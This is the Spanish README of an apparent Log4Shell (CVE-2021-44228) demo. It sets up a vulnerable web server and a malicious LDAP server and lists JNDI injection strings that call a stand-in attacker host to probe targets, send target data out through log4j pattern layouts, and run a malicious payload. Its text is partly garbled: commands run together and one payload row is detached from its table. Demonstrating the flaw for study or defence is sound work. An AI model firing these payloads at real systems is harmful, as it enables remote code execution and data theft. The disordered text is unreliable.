
Una demo de la vulnerabilidad Log4Shell (CVE-2021-44228).
Una demo de la vulnerabilidad Log4Shell (CVE-2021-44228).
El servidor web vulnerable y el servidor LDAP malicioso fueron compilados y probados en JDK 1.8.0_181.
goodguys, ejecute gradlew bootJarjava -jar build/libs/goodguys-0.0.1-SNAPSHOT.jarbadguys, ejecute mvn packagejava -jar .\target\evil-server.jarNota: Windows Defender puede mover silenciosamente
target\classes\Exploit.classa la cuarentena.
Los comandos maliciosos están definidos dentro de Exploit.java.
| Entrada | Observaciones |
|---|---|
${jndi:ldap://evil-server-hostname:389/Recon} | Comprueba si el objetivo es vulnerable escuchando una solicitud de conexión al servidor LDAP. |
${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)] | Agregue cualquier layout de patrón log4j válido para recopilar los datos del objetivo y mostrarlos en la terminal del atacante. |
https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/
https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/
${jndi:ldap://evil-server-hostname:389/Exploit} | Ejecute la carga maliciosa. |